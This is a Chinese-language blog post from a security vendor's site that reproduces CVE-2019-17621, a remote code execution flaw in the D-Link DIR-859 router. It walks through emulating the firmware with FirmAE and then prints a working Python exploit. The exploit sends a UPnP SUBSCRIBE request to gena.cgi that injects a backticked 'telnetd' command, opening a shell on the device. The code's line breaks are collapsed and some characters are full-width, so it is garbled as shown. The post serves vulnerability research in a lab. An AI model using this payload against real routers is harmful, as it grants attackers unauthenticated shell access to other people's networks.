D-Link DIR-859 RCE漏洞（CVE-2019-17621）复现





首页 产品与服务 解决方案 客户案例 技术支持 合作发展 关于美创 用户退出 合作商登录 用户登录 申请试用

行业解决方案政府解决方案金融解决方案医疗解决方案教育解决方案能源解决方案物流交通解决方案

售后服务文档中心年度培训

渠道政策申请成为合作伙伴渠道专区

公司动态行业资讯安全研究

热门阅读

2025中国互联网产业年会丨《中国互联网产业绿色算力发展倡议》正式发布

2025-02-07

美创用户专访 | 精细化管理：医疗行业数据分类分级的策略与实践

2025-01-10

容灾演练双月报｜美创助力某特大型通信基础设施央企顺利完成多个核心系统异地容灾演练

2025-01-10

国家级｜美创、徐医附院共建项目入选工信部《2024年网络安全技术应用典型案例拟支持项目名单》

2024-12-20

全球数据跨境流动合作倡议

2024-11-22

每周安全速递³⁴⁴ | 维多利亚的秘密因网络安全事件推迟2025年一季度财报发布

2025-06-06

每周安全速递³⁴³ | Everest勒索软件泄露可口可乐员工数据

2025-05-30

每周安全速递³⁴² | 勒索组织El Dorado攻击中东薪资服务商BSH间接导致博通员工敏感数据泄露

2025-05-23

每周安全速递³⁴¹ | 摩尔多瓦执法机关逮捕涉嫌DoppelPaymer勒索软件攻击的嫌疑人

2025-05-16

每周安全速递³⁴⁰ | 黑客利用配置不当的K8s集群部署挖矿软件

2025-04-30

D-Link DIR-859 RCE漏洞（CVE-2019-17621）复现

发布时间：2023-03-17 阅读次数： 644 次

环境搭建

1.FirmAE 工具安装

首先拉取FirmAE 工具仓库

git clone --recursive https://github.com/pr0v3rbs/FirmAE

运行下载脚本

cd FirmAE/./download.sh

运行./install.sh进行安装

2.下载固件

本文模拟的是设备型号为D-Link DIR-859

下载地址:

http://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DIR-859

下载后得到DIR859Ax_FW105b03.bin固件文件

3.FirmAE工具初始化

在FirmAE工具目录下执行./init.sh进行初始化

4.安装binwalk

这里使用FirmAE工具目录下的binwalk安装程序进行安装

cd binwalk-2.3.3/python3 setup.py install

5.模拟运行固件
执行如下命令对固件进行解压

binwalk -Me /root/DIR859_FW102b03.bin --run-as=root

执行如下命令来模拟运行固件

sudo ./run.sh -r DIR-859 /root/DIR859_FW102b03.bin

使用浏览器访问http://192.168.0.1，出现如下界面则表明成功模拟了一台D-Link DIR-859路由器

漏洞复现

查看端口

nmap 192.168.0.1

使用49152端口

EXP内容如下：

import socketimport osｆｒｏｍ time import sleep
def httpSUB(server, port, shell_file):    con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    Payload = "SUBSCRIBE /gena.cgi?service=" + str(shell_file) + " HTTP/1.0\n"    Payload += "Host: " + str(server) + ":" + str(port) + "\n"    Payload += "Callback: <http://192.168.126.128:33/>\n"    Payload += "NT: upnp:event\n"    Payload += "Timeout: Second-1800\n"    Payload += "Accept-Encoding: gzip, deflate\n"    Payload += "User-Agent: gupnp-universal-cp GUPnP/1.0.2 DLNADOC/1.50\n\n"    print(Payload)    sleep(1)    print('[*] Sending Payload')    con.connect((socket.gethostbyname(server),port))    con.send(Payload.encode())    results = con.recv(4096)
    sleep(1)    print('[*] Running Telnetd Service')
serverInput = raw_input('IP Router: ')portInput = 49152
httpSUB(serverInput, portInput, '`telnetd`')